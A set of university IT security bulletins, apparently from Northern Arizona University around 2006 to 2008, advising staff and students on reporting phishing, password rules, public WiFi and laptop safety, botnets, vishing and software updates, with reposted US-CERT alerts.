Phishing is the fraudulent process of attempting to acquire sensitive information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Phishing schemes can be used by attackers for a variety of things. Here at NAU, attacks designed to gather user ids and passwords of accounts have been successfully used to take over email accounts and use them to send spam. Having an account stolen as a result of a successful phishing attack is very disruptive to the campus, as it usually results in all campus email being blocked by major email providers such as Hotmail and Yahoo. It’s particularly disruptive to the owner of the compromised account, as ITS must disable their access to prevent continued abuse of the account and investigate the extent of the break-in. In order to help minimize the impact of phishing attacks, it’s important for everyone to promptly and properly report them to the appropriate authorities.

The first step is to identify the appropriate authority.

• If the message is spoofing an NAU department, report it to the NAU Solution Center or Student Technology Services Help Desk.
• If the attack is spoofing an entity other than NAU, the attack should be reported to that agency.

The second step is to gather the appropriate information to be reported. Whether you are reporting a phishing attack to NAU or another agency, the person receiving the report will need the original message you received and the normally hidden email headers.

Outlook 2003/2008

While looking at the list of messages in your inbox, right-click on the phishing message. There should be an entry labeled Message Options… (or simply Options… in 2003). Select this and a new window will open. At the bottom of the window will be a text box containing the full email headers. Select and copy everything in the text box and paste it into the email you are about to forward. Make sure the email is addressed to the proper authority. Click Send.

Entourage

View the message. Then go to the Message -> Internet Headers menu item. This will display all the headers. Select and copy the headers. Click your mouse in the forwarded message where you want to insert the headers and paste them in. The shortcut key to accomplish this is Command-Shift-H.

Mac Mail

View the message, then go to the View -> Message -> Long Headers menu item. The headers will be exposed in the email. Click anywhere in the headers, and select and copy them. Click your mouse in the forwarded message where you want to insert the headers and paste them in. Repeat the View -> Message -> Long Headers action to turn off showing full headers. The shortcut key to turn on and off exposure of headers is Command-Shift-H.

Thunderbird

While viewing the message, go to the View -> Message Source menu item. This will open a separate window with the entire message including headers and HTML formatting exposed. Select and copy this text, open a new message, and paste everything in as the body of the message.

Office Web Access (OWA)

Bring up OWA in Internet Explorer so that you get the full OWA version. Double-click on the message in the inbox so the message opens in its own window. At the top of the window will be several icons. One of them is the Message Details icon. It is a picture of an open envelope with a sheet of paper superimposed over the right side of the envelope. It’s just to the left of the Printer icon. Click the Message Details icon, and a new window will open. At the bottom of the window will be a text box containing the headers. Select, copy, and paste the headers into the email with the forwarded phish message.

The final step is to forward the original email and the header information to the appropriate agency.

• Report phishing attacks spoofing NAU to the Solution Center with the email address ask-its@nau.edu, or the Student Technology Center Help Desk at acad-help@nau.edu.
• If the attack is spoofing a company other than NAU, a commonly available email address for this is the Abuse address. Many companies on the Internet have an Abuse account for reports of misbehavior like phishing attempts. To send email to this account, you must first identify the company’s Internet name. This should be the same as the name of their main web site, without the “www” prefix. For example, the Arizona State Credit Union’s web site is www.azstcu.org. Their abuse account is abuse@azstcu.org

If you encounter difficulty following these instructions, or just feel you need an extra helping hand, call the Solution Center at 3-1511 or Student Technology Center Help Desk at 3-9294. Someone will be glad to assist you in working through this process.

New password change enhancements were introduced in the fall of 2008. There has been some confusion about the changes. Here, then, is a recap of the complexity rules that were put in place on the password change application page.

Password Complexit Requirements

Passwords chosen must:

• be a minimum of seven (7) characters in length
• be a maximum length of (128) characters
• contain at least one (1) character from three (3) of the following categories:
• Upercase letter (A-Z)
• Lowercase letter (a-z)
• Digit (0-9)
• Special character `~!@#$%^&*()_+-={}|\:";'<>?,./
• The password does not contain three or more consecutive characters from the user’s account name or display name. If the account name is less than three characters long, then this check is not performed because the rate at which passwords would be rejected would be too high. When a check is performed against the user’s full name, several characters are treated as delimiters that separate the name into individual tokens: commas, periods, dashes/hyphens, underscores, spaces, pound signs, and tabs. For each token that is three or more characters long, that token is searched for in the password, and if it is present the password change is rejected.

For example, the name Erin M. Hagens would be split into three tokens: Erin, M, and Hagens. Because the second token is only one character long it would be ignored. Therefore this user could not have a password that included either "erin" or "hagens" as a substring anywhere in the password.

All of these checks are case insensitive.

Password Expiration

This setting determines the amount of time (in days) that a password can be used before the system requires the user to change it. The value has been set at 42 days for faculty and staff, but it will be changed to 90 days for all faculty, staff and students later this spring.

These changes will only help to protect your password to the extent that you do. Remember that it is against the NAU Acceptable Use policy to share your password. If you follow the above guidelines and you protect your password, you will be taking a big step toward protecting the university's and your own information.

NAU email account holders continue to be targeted by fraudulent emails. These targeted emails, known as spear phishing attacks, claim to be from the NAU.edu Web team or University Services and request account holders to share their username and password with the sender. The recipients of such messages are often threatened the deactivation of their email accounts if they don’t reply. Some of the email messages are blatantly and obviously fraudulent, while others are more subtle and convincing, but all have been very effective in harvesting Internet IDs and passwords. One link has been known to take a user to a login page that is very similar in appearance to the NAU login page. These messages are not from Northern Arizona University. NAU will NEVER ask you to provide personal information, such as passwords or social security numbers, by email.

We recommend that if you receive an unsolicited email or you are unsure of the sender, you do not reply, do not click any links contained within it, and do not open any attached files. Those actions have been known to infect computers.

If you receive an email that claims to be from the University and asks for your Internet ID and password, forward it, with all headers and the entire message, to infosec@nau.edu. (Find instructions for expanding headers at www.spamcop.net/fom-serve/cache/19.html.) Fraudulent email claiming to be sent by outside agencies (PayPal, Wells Fargo or Arizona State Credit Union, for example) should be reported directly to the company.

See www.onguardonline.gov/topics/phishing.aspx for additional information and advice about these kinds of attacks.

It has been some time since a thorough review of password management at NAU was conducted. Recently, concern was raised by a student in a campus information security course that the Academic Computing Help Desk was not requiring stringent enough criteria for completing an over-the-phone password change. Specifically, the student felt that much of the information being requested was readily available online. We appreciated the student’s feedback and concern and organized a review of our current password change policies and processes.

The review of password policy at NAU covered the following areas:

1. Password requirements
   What is allowed
   What is not allowed
2. Password management rules:
   Password change cycle
   Password aging
   Password timeouts
3. Password change mechanisms
   In-person change request
   Over-the-phone change request
   On-line change request

The outcome of the review was the following recommendations, which will be implemented for faculty, staff, and students beginning November 3, 2008.

Passwords Complexity Requirements

Passwords chosen must:

• be a minimum of seven (7) characters in length
• be a maximum length of (128) characters
• contain at least one (1) character from three (3) of the following categories:
• Uppercase letter (A-Z)
• Lowercase letter (a-z)
• Digit (0-9)
• Special character ` ~ ! @ # $ % ^ & * ( ) _ + - = { } | \ : " ; ' < > ? , . /
• The password does not contain three or more consecutive characters from the user's account name or display name. If the account name is less than three characters long, then this check is not performed because the rate at which passwords would be rejected would be too high. When a check is performed against the user's full name, several characters are treated as delimiters that separate the name into individual tokens: commas, periods, dashes/hyphens, underscores, spaces, pound signs, and tabs. For each token that is three or more characters long, that token is searched for in the password, and if it is present the password change is rejected.

For example, the name Erin M. Hagens would be split into three tokens: Erin, M, and Hagens. Because the second token is only one character long it would be ignored. Therefore this user could not have a password that included either "erin" or "hagens" as a substring anywhere in the password. All of these checks are case insensitive.

Maximum Password Age

This setting determines the amount of time (in days) that a password can be used before the system requires the user to change it. The value has been set at 42 days for faculty and staff and will be set to 90 days for all faculty, staff and students.

Minimum Password Age

This setting determines the number of days that must pass before users can change their passwords. Defining a minimum password age prevents users from circumventing the password history policy by defining multiple passwords in rapid succession until they can use their old passwords again. The value for this setting is five minutes, which discourages rapid password recycling but permits users to eventually change their passwords.

Enforce Password History

This setting determines the number of unique new passwords that must be associated with a user account before an old password can be reused. It also rejects new passwords that are too similar to old passwords. This setting feature prevents users from circumventing password expiration restrictions by recycling old passwords or ones like them. The value will be set at four.

Account Lockout Threshold

This security setting determines the number of failed logon attempts that causes a user account to be locked out. A locked-out account cannot be used until it is reset by an administrator or until the lockout duration for the account has expired. This value will set at six.

Account lockout duration

This security setting determines the number of minutes a locked-out account remains locked out before automatically becoming unlocked. The lockout duration will be set to thirty minutes or until administrator enables the user ID.

Reset account lockout counter after

This security setting determines the number of minutes that must elapse after a failed logon attempt before the failed logon attempt counter is reset to 0 bad logon attempts. If an account lockout threshold is defined, this reset time must be less than or equal to the Account lockout duration. This value should be set at two minutes.

These rules will be implemented in November along with a revamped password change website. The password change site will incorporate the above rules along with increased functionality for verifying the user online.

These changes will only help to protect your password to the extent that you do. Remember that it is against the NAU Acceptable Use policy to share your password. If you follow the above guidelines and you protect your password, you will be taking a big step toward protecting the university’s and your own information.

Staying connected everywhere all the time—that’s what it’s about, isn’t it? To be sure, that’s where we’re headed according to the common wisdom on the future of computing. Apple even introduced the thinnest laptop ever, the MacBook Air, designed around the notion that everything, including installation of new applications, can occur via the airwaves. Clearly, the future of computing is going to be wireless, freeing us to truly carry our lives, our work, and what has become essentially our other brain, everywhere.

On the road to this ultimate Xanadu, however, we still have to make do with occasionally spotty network coverage, but at least these days you can connect at your favorite coffee house, or at the airport, around a university, or in most corporate settings. You might even surf on a stray network that’s available without password protection if the signal bleeds over to your location.

But just because you can does not mean you should. Lagging far behind the increasing availability of wireless networks and free Internet hotspot expansion is the dissemination of knowledge about what constitutes a safe connecting. Even if you are sending email or buying that killer guitar on eBay through a secure server, it may be possible that if you are doing it through a free wireless connection, you might be broadcasting private information into the clear air. And that means that someone without your interests at heart could be siphoning off that same data to enrich himself at your expense.

Consider the scenario: You open your laptop at an airport or at Buzz’s Buzz Barn coffee house and you’re asked if you’d like to join the available network. Why not? It’s free, and you’ve got some time to kill. Pretty soon you’re upping your bid on that kitschy clown painting on eBay, selling ten thousand shares of Google, and logging into your email account. However, while you may think you are connected directly to the airport server or Buzz’s secure network, in fact you have connected to their networks through another party’s computer, and that person is now recording every byte you send, including your passwords, credit card information, brokerage account data, and your love poem to your significant other.

What has happened is a “man-in-the-middle” attack, also known as the “evil twin,” where you mistakenly have connected to a WiFi hotspot which has been set up by an identity thief who is there to steal your personal information. He makes his WiFi connection look like something legitimate for the area you’re in. And if he’s a particularly malevolent sort, he may also be infecting your computer with some nasty viruses that you’ll unwittingly take back to the office or to your home.

Or perhaps someone is simply running a packet sniffer to copy everything that flies between your laptop and the wireless access point. This is pretty easy to do on an unsecured network, by the way. The tools to capture credit card numbers and passwords are available for free through the Internet.

Although you should be cautious, it’s not something to lose sleep over. The dangers do indeed exist, but as with all dangers in life, if you learn the avoidance and counter strategies, and then you can put them out of your mind.

Learn what you need to protect yourself, despite the expense of losing that so wonderfully and totally integrated-into-the-global-grid feeling. Security feels pretty good too. Here are some precautions to take.

• Use VPN—Virtual Private Network whenever possible. This provides a secure connection all the way from your laptop to the server you’re using. You can learn all about it at www4.nau.edu/its/mensa/services/vpn. One caveat—set up your VPN on a secure network before you use it in public. Setting it up at Buzz’s Buzz Barn is a bad idea.
• Even if you are using NAU’s VPN or another VPN, remember that once you leave the network—you open another browser to connect to Yahoo!, for example—you may no longer be on a secure connection. If you’re not certain you’re secure, then assume you’re not.
• Make sure that you’re actually connecting to the wireless router provided by the airport or business you’re expecting. In an airport look for signs that give the network name. At a coffee house, ask what the name of their official network access point is. Don’t simply pick one out of a list that comes up when you go to connect. Know what and where you’re connecting to.
• Turn off shared folders, files, and print sharing. Think of your data as cash in your pocket. Who would you want to have it?
• Look over your shoulder. Even if you’re using VPN on a legitimate WiFi connection, beware of your neighbors “shoulder surfing” as you send and receive information. Although people do this simply out of boredom or proximity, this low-tech approach is often quite successful for those with less-than-honorable intent. One single compromised password can get very, very costly.
• Keep your security software up to date. Hackers never take a day off!
• Never take a free ride on an unknown WiFi network just because it’s there and free. Consider the possibility that someone has baited a trap for you by leaving his network open to your access. Don’t be the signal thief rat caught under the wire trap bale when it snaps down, squeezing your passwords and credit card data out of you.
• If you use email via WiFi, consider forwarding your mail to a junk address that you use solely when connected wirelessly. This can prevent a malicious attacker from attacking your legitimate email account if your password is compromised to the junk account.
• If you are using Internet Explorer as your browser, turn off “Use Inline AutoComplete” under Internet Options Advanced settings. This prevents your machine from caching, or storing, your userID and password.\\
• Never check any box offering to remember you by your computer or your username and password.
• Finally, be aware that even if operating through an encrypted channel, a technique known as “sidejacking” can be used to capture your cookies from transactions on social networking sites. Sometimes cookies contain login information if the user has asked the site to “remember” his login and password. So although it’s tedious, type it in new rather than acquiescing to convenience, but only on a secure connection!

It really is going to be a big, wide, wonderful WiFi world someday, and there’s no reason to tread in fear. Just be aware and be prepared.

ITS Info Spring 2008- New laptop computers are more powerful, have longer lasting batteries, are lighter in weight than their predecessors, and readily take advantage of the wireless networking being installed all around the NAU campus. As such, we have seen an increase in laptop use and several spurts of laptop theft.

Being ever more vigilant about cyber crime and identity theft, you’ve likely taken steps to secure the data on your laptop. You’ve installed a firewall. You update your antivirus software. You protect your information with a strong password. You encrypt your data, and you’re far too smart to fall for those emails that ask for your personal information. But what about the physical laptop itself? A minor distraction is all it takes for your laptop to vanish. If it does, you may lose more than an expensive piece of hardware. The fact is, if your data protections aren’t up to par, that sensitive and valuable information in your laptop may be a magnet for an identity thief.

Chances are you’ve heard stories about stolen laptops on the news or from friends and colleagues. None of us thinks his or her own laptop will be stolen—at least not until you find the trunk of your car pried open, notice that your laptop isn’t waiting at the other side of airport security, or get a refill at the local java joint only to turn around and find only exposed tabletop where your laptop once was.

OnGuardOnline, a website managed by the federal government that is devoted to computer security, protecting personal information, and guarding against Internet fraud, suggests keeping these tips in mind when you take your laptop out and about:

reat your laptop like cash. If you had a wad of money sitting on the table at the library, would you turn your back on it—even for just a minute? Would you put it in checked luggage? Leave it on the backseat of your car? Of course not. Keep a careful eye on your laptop just as you would a pile of cash.

Keep it locked. Whether you’re using your laptop in the office, a hotel, or some other public place, a security device can make it more difficult for someone to steal it. Use a laptop security cable and attach it to something immovable or to a heavy piece of furniture that’s difficult to move—say, a table or a desk.

Keep it off the floor. No matter where you are in public—at a conference, a coffee shop, or a registration desk—avoid putting your laptop on the floor. If you must put it down, place it between your feet or at least up against your leg so that you’re aware of it.

Keep your passwords elsewhere. Remembering strong passwords or access numbers can be difficult. However, leaving either in a laptop carrying case or on your laptop is like leaving the keys in your car. There’s no reason to make it easy for a thief to get to your personal or corporate information.

Mind the bag. When you take your laptop on the road, carrying it in a computer case may advertise what’s inside. Consider using a suitcase, a padded briefcase, a backpack, or even an ugly tote bag instead.

Get it out of the car. Don’t leave your laptop in the car—not on the seat, not in the trunk. Parked cars are a favorite target of laptop thieves; don’t help them by leaving your laptop unattended. If you must leave your laptop behind, keep it out of sight.

Don’t leave it “for just a minute.” Your conference colleagues seem trustworthy, so you’re comfortable leaving your laptop while you network during a break. The people at the coffee shop seem nice, so you ask them to keep an eye on it while you use the restroom. Don’t leave your laptop unguarded—even for a minute. Take it with you if you can, or at least use a cable to secure it to something heavy.

Pay strict attention in airports. Keep your eye on your laptop as you go through security. Hold onto it until the person in front of you has gone through the metal detector—and keep an eye out when it emerges on the other side of the screener. The confusion and shuffle of security checkpoints can be fertile ground for theft.

Be vigilant in hotels. If you stay in hotels, a security cable may not be enough. Try not to leave your laptop out in your room. Rather, use the safe in your room if there is one. If you’re using a security cable to lock down your laptop, consider hanging the “do not disturb” sign on your door.

Use bells and whistles. Depending on your security needs, an alarm can be a useful tool. Some laptop alarms sound when there’s unexpected motion or when the computer moves outside a specified range around you. Or consider a kind of “lo-jack” for your laptop: a program that reports the location of your stolen laptop once it’s connected to the Internet.

Where to turn for help. If your personal laptop is stolen, report it immediately to the local authorities. If it’s your university laptop that’s missing, notify the local authorities and then immediately notify your supervisor. Then go to www.nau.edu/security, click on “report an incident,” and complete the incident form.

If it’s your personal laptop and you fear that your information may be misused by an identity thief, visit www.ftc.gov/idtheft for more information.

May 11, 2007 - In 1995, the authoritative and somber voiceover by actor Sam Waterston was ominous: "You need to feel safe. And that's harder to do nowadays, because robots may strike at any time."

Of course, this was only a fake television commercial presented on Saturday Night Live for Old Glory Insurance's policies offering protection to senior citizens from robot attacks. It's still a funny bit to watch. But now the robots really are attacking. Although they don't threaten with their metal claws, they now attack by enlisting legions of new allies--the zombie computers. This powerful rogue army is rampaging across the globe, and even worse, you might be an unwitting accomplice in the recruitment of the malevolent mass, known as botnets. Imagine Night of the Living Dead in cyberspace. We now face Attack of the Botnets.

"WARNING: Persons denying the existence of robots may be robots themselves."

Among the richest environments for botnet infiltration, according to a New York Times article from January 6, 2007, are university networks. With their high-speed Internet capabilities, vast computing resources, large databases, and population of users that includes students, faculty, and staff members who may not be aware of the part they play in the creation of criminal botnet attack forces, universities are a prime target for criminal elements. According to Internet pioneer David J. Farber, quoted in the Times article, "It represents a threat but it's one that is hard to explain… the scope of the problem is still not clear to most people." This is no longer idle vandalism by cut-and-paste script kiddies, but serious illegal activity by professional criminals.

On our campus, computer users take advantage of the services offered within the university and also from the greater Internet community: e-mail, web surfing, music downloading, interactive gaming, Internet chat sessions, picture sharing, blogging and countless other activities. Therein lurks the danger. Because so many of these services cost nothing and are easy to access, they mask the insidious threat that may creep beneath the seductive user interface and friendly banter. By clicking that attachment to an email with subject line "Sign Up for Sweepstakes!!!!" you could be enabling code that might turn your laptop into a zombie under the control of robot masters unknown to you.

Large collections of such pirated systems can be commanded remotely to send out spam mailings or to search files for financial or security data. With 650 million computers now connected to the Internet worldwide, the opportunities are attractive to cyber criminals. Botnets are made up of programs running on many machines cooperatively under the control of a central automated authority, which in turn is controlled by a determined human somewhere in the world. And with criminals willing to pay money for access to restricted information or to send out millions of emails offering fake prizes to lure in yet more unknowing users, there is a lot of profit for the controllers of botnets.

To give an idea of the extent of this capability, one botnet ring broken up in the Netherlands in late 2005 had commandeered a network of 1.5 million computers. Given the multiplicative power of nodes linked together, this is an astounding figure. And remember, the vast majority of the owners of these machines had no idea that their resources were being used for illegal activity. It is estimated that 80 to 90 percent of all spam --that e-mail we all love so dearly-- is sent by such zombie networks.

Despite the robust security measures taken at institutions like NAU, in order to keep the Internet open and useful some of the responsibility has to be borne by the end users themselves by applying a few common sense security rules:

• Never, ever share your passwords or account information.
• Always use combinations of upper- and lower-case letters, numbers, and special characters in passwords to defeat brute force dictionary-based cracking schemes.
• Don't use the same password on every account.
• Don't permit your web browser to store your passwords for you.
• Never send your password in a session that you did not initiate--that is, don't respond to requests for passwords if you have not sought out the requesting site for your own purposes. Be sure you know the entity requiring it.
• Never respond to an email request for your passwords. No responsible outfit ever solicits your password or account information with an out-of-the-blue email. Don't believe subject lines like "Your account is overdrawn," or "In response to your request."
• Never click on attachments on e-mails that are from sources unknown to you
• Whenever spam e-mails offer a killer deal on some item or service, the odds strongly favor that a rip-off is in progress. Never respond to these come-ons. If it seems like an unbelievable deal, it's most likely because it's false.
• Use a firewall program that alerts you to unexpected use of outgoing connections on your computer.
• Never leave your computer unattended when you are logged into any of your private accounts.
• Regularly run anti-virus software to check for worms, Trojan horses, and viruses on your computer.
• Report any suspected hostile attack to Information Technology Services.

The response to these concerted attacks on innocent institutions and users requires a dual-edged counter by the service providers and their customers. Security is everybody's business.

"So, don't cower under your afghan any longer. Make a choice. Old Glory Insurance. For when the metal ones decide to come for you--and they will."

Prophetic words indeed, Mr. Waterston.

February 2, 2007 - Apparently, you can't go back into the past, but you can certainly borrow from the past. We see it every day: clothes from the seventies, the T-bird from Ford, even talk of a Police reunion tour. With each instance, we see that there has been a slight update to the original, and yet still enough of the original remains intact to invoke images of a kinder, gentler, past which time and nostalgia have placed in our memories.

Well, wake up! Will Rogers once said, "Things ain't what they used to be and probably never was."

One thing that has been reincarnated from that "kinder, gentler past" is the phone scam. With the aid of computer technology, it too has been given a slight update from the original and is now referred to as vishing.

Vishing which is the combination of Voice and Phishing is one more approach to stealing your personal identity or financial data. As we have been bombarded by the waves of web and e-mail scams bombard us, we have slowly forgotten the dangers of the past for the dangers of today. And as we have adapted and become more careful to avoid the computer scam of the day, the criminal element has adapted by bringing back a thing of comfort from the past, the telephone transaction. Yet this time they are using Voice Over Internet Protocol, or VoIP, to hide their trail.

In vishing, instead of receiving an e-mail claiming that your account has been compromised, the message is delivered via a VoIP system. The message might claim that your credit card has been illegally used or that there has been unusual activity on the account. It then requests you to call the number in the message immediately to protect your credit.

If you call the number, you will get an automated system which asks you to enter your account information for verification. Once you have entered your account number the system may disconnect or it may request that you continue to press keys for additional information. Once you have divulged that information your account has truly been compromised. This entire process can be automated with call control programs that can work tirelessly through a collection of numbers or a specific geographic area, and it only takes a tiny response rate to make it profitable.

Phone scams were here long before the computer arrived on the scene. Treat these calls just as you would any "phishy" e-mail or web-scam. Don't reply to the request, and contact your financial institution using only the methods you have already established.

As George Wildman Ball said, "Nostalgia is a seductive liar."

So remember the past and protect your future.

November 8, 2006 - Please share this information. Note that this can have an impact on Mac and Windows users.

National Cyber Alert System

Technical Cyber Security Alert TA06-312A

Mozilla Updates for Multiple Vulnerabilities

Original release date: November 8, 2006
Last revised: --
Source: US-CERT

Systems Affected

• Mozilla SeaMonkey
• Mozilla Firefox
• Mozilla Thunderbird
• Netscape web browser

Overview

The Mozilla web browser and derived products contain several vulnerabilities, the most serious of which could allow a remote attacker to execute arbitrary code on an affected system.

I. Description

Several vulnerabilities have been reported in the Mozilla web browser and derived products. Mozilla has released three security advisories to describe the vulnerabilities:

Mozilla Foundation Security Advisory 2006-67 addresses a remote code execution vulnerability in the way JavaScript is handled by Firefox, Thunderbird, and SeaMonkey. More information can be found in VU#714496.

Mozilla Foundation Security Advisory 2006-66 addresses a vulnerability in the way RSA signatures are handled by Firefox, Thunderbird, and SeaMonkey. More information can be found in " VU#335392.

Mozilla Foundation Security Advisory 2006-65 addresses three memory corruption vulnerabilities in Firefox, Thunderbird, and SeaMonkey. More information can be found in VU#815432, VU#390480, and VU#495288.

Any products based on Mozilla components, specifically Gecko, may also be affected by VU#714496, VU#815432, VU#390480, and VU#495288.

Any software that uses the Mozilla Network Security Services (NSS) library may be affected by VU#335392.

II. Impact

The most severe impact of these vulnerabilities could allow a remote attacker to execute arbitrary code with the privileges of the user running the affected application. Other effects include forging an RSA signatures and denial of service. A remote, unauthenticated attacker could execute arbitrary code, or cause a denial of service

Forging an RSA signature (VU#335392) may allow an attacker to craft a TLS/SSL or email certificate that will not be detected as invalid. This may allow that attacker to impersonate a website or email system that relies on certificates for authentication.

III. Solution

Upgrade

These vulnerabilities are addressed in Mozilla Firefox 1.5.0.8, Mozilla Thunderbird 1.5.0.8, and SeaMonkey 1.0.6.

According to Mozilla:

Firefox 1.5.0.x will be maintained with security and stability updates until April 24, 2007. All users are strongly encouraged to upgrade to Firefox 2.

IV. References

• Vulnerability Note VU#335392 - <http://www.kb.cert.org/vuls/id/714496>
• Vulnerability Note VU#714496 - <http://www.kb.cert.org/vuls/id/335392>
• Vulnerability Note VU#815432 - <http://www.kb.cert.org/vuls/id/815432>
• Vulnerability Note VU#390480 - <http://www.kb.cert.org/vuls/id/390480>
• Vulnerability Note VU#495288 - <http://www.kb.cert.org/vuls/id/495288>
• Mozilla Foundation Security Advisories - <http://www.mozilla.org/security/announce/>
• Known Vulnerabilities in Mozilla Products - <http://www.mozilla.org/projects/security/known-vulnerabilities.html>
• Securing Your Web Browser - <http://www.us-cert.gov/reading_room/securing_browser/browser_security.html#Mozilla_Firefox>
• Mozilla Hall of Fame - <http://www.mozilla.org/university/HOF.html>
• Site Controls - <http://browser.netscape.com/ns8/help/options-site.jsp>

September 15, 2006 - Please share this information. Note that this can have an impact on Mac and Windows users.

National Cyber Alert System

Cyber Security Alert SA06-256A

Apple QuickTime Vulnerabilities

Original release date: September 13, 2006
Last revised: --
Source: US-CERT

Systems Affected

Apple QuickTime for

• Apple Mac OS X
• Microsoft Windows

Overview

Apple has released Apple QuickTime 7.1.3 to correct several vulnerabilities. These vulnerabilities could allow an attacker to gain access to your computer.

Solution

Install an Update

OS X users should use the Mac OS X Software Update feature to download and install Apple QuickTime 7.1.3. Consider scheduling Software Update to check for updates automatically (this option is enabled by default).

Microsoft Windows users should upgrade to Apple QuickTime 7.1.3.

Description

QuickTime prior to version 7.1.3 has multiple image and media file handling vulnerabilities that could allow an attacker to run malicious programs on your computer. This could happen by visiting a malicious web site. Upgrading to Apple QuickTime version 7.1.3 will correct these vulnerabilities.

Note that QuickTime is included with Apple iTunes.

For more technical information, see US-CERT Technical Alert TA06-256A and the Apple QuickTime Security Update.

References

• US-CERT Technical Alert TA06-256A
  <http://www.us-cert.gov/cas/techalerts/TA06-256A.html>
• Vulnerability Notes for QuickTime 7.1.3
  <http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_713>
• About the security content of the QuickTime 7.1.3 Update
  <http://docs.info.apple.com/article.html?artnum=304357>
• Apple QuickTime 7.1.3
  <http://www.apple.com/support/downloads/quicktime713.html>
• Standalone Apple QuickTime Player
  <http://www.apple.com/quicktime/download/standalone.html>
• Mac OS X: Updating your software
  <http://docs.info.apple.com/article.html?artnum=106704>
• Securing Your Web Browser
  <http://www.us-cert.gov/reading_room/securing_browser/>
• Mac OS X: Updating your software
  <http://docs.info.apple.com/article.html?artnum=106704>

August 18, 2006 - The complexity of computer and network infrastructures and the challenge of administration makes it difficult to properly manage network security. Network and system administrators do not have sufficient people and security practices in place to defend against attacks and minimize damage. As a result there are a rising number of computer security incidents.

When computer security incidents occur, organizations must respond quickly and effectively. The faster an organization recognizes, analyzes, and responds to an incident, the better it can limit damage and lessen recovery costs. Establishing a Computer Security Incident Response Team (CSIRT) is a great way to provide this rapid response capability as well as help prevent future incidents.

The draft of the CSIRT policy is available in PDF and DOC formats.

August 18, 2006 - The Internet can make your shopping faster and easier, but there can also be pitfalls if you're not careful. Here is some advice from the National Consumers League, the Better Business Bureau and the National Cyber Security Alliance for a safe online shopping experience:

1. Know who you're dealing with.
   Check out unfamiliar sellers with the Better Business Bureau and your state or local consumer protection agency. If you're buying gifts on an online auction site that provides a feedback forum, check the track record of the seller before you bid. Don't buy things in response to unsolicited e-mails from unknown companies, since these may be fraudulent.
2. Get all the details.
   Get the name and physical address of the seller; how much the product or service costs; what is included for that price; whether there are shipping charges; the delivery time, if any; the seller's privacy policy; and the cancellation and return policy.
3. Look for signs that online purchases are secure.
   When providing your payment information, the URL should change from http to shttp or https, indicating that the information is being encrypted-turned into code that can only be read by the seller. Your browser may also signal that the information is secure with a symbol, such as a broken key that becomes whole or a padlock that closes.
4. Pay the safest way.
   It's best to use a credit card, especially when you're purchasing something that will be delivered later, because under federal law you can dispute the charges if you don't get what you were promised. You also have dispute rights if there are unauthorized charges on your credit card, and many card issues have "zero liability" policies under which you pay nothing if someone steals your credit card number and uses it.
5. Never enter your personal information in a pop-up screen.
   When you visit a company's Web site, an unauthorized pop-up screen created by an identity thief could appear, with blanks for you to provide your personal information. Legitimate companies don't ask for personal information via pop-up screens. Install pop-up blocking software to avoid this type of scam.
6. Keep documentation of your order.
   When you've completed the online order process, there may be a final confirmation page and/or you might receive confirmation by email. Print that information and keep it handy in case you need it later.
7. Know your rights.
   Federal law requires orders made by mail, phone or online to be shipped by the date promised or, if no delivery time was stated, within 30 days. If the goods aren't shipped on time, you can cancel and demand a refund. There is no general three-day cancellation right, but you do have the right to reject merchandise if it's defective or was misrepresented. Otherwise, it's the company's policies that determine if you can cancel the purchase and whether you can get a refund or credit.
8. Be suspicious if someone contacts you unexpectedly and asks for your personal information.
   Identity thieves send out bogus e-mails about problems with consumers' accounts to lure them into providing their personal information. Legitimate companies don't operate that way.
9. Check your credit card and bank statements carefully.
   Notify the bank immediately if there are unauthorized charges or debits, if you were charged more than you should have been, or if there are any other problems.
10. Keep your computer secure for safe shopping and other online activities.
    
    Protect your computer with spam filters, anti-virus and anti-spyware software, and a firewall, and keep them up to date. Contact Northern Arizona University's Solution Center to learn more about how to keep your computer secure: (928) 523-1511.
11. Beware of e-mails offering loans or credit, even if you have credit problems.
    Con artists take advantage of cash-strapped consumers during the holidays to offer personal loans or credit cards for a fee upfront. These scammers simply take the money and run.
12. Contact the seller promptly about any problems with your order.
    Check the company's Web site for a customer service page, "contact us" link, email address, or phone number to get your complaint addressed or questions answered. If you can't resolve the problem, contact the Better Business Bureau or your state or local consumer protection agency for help.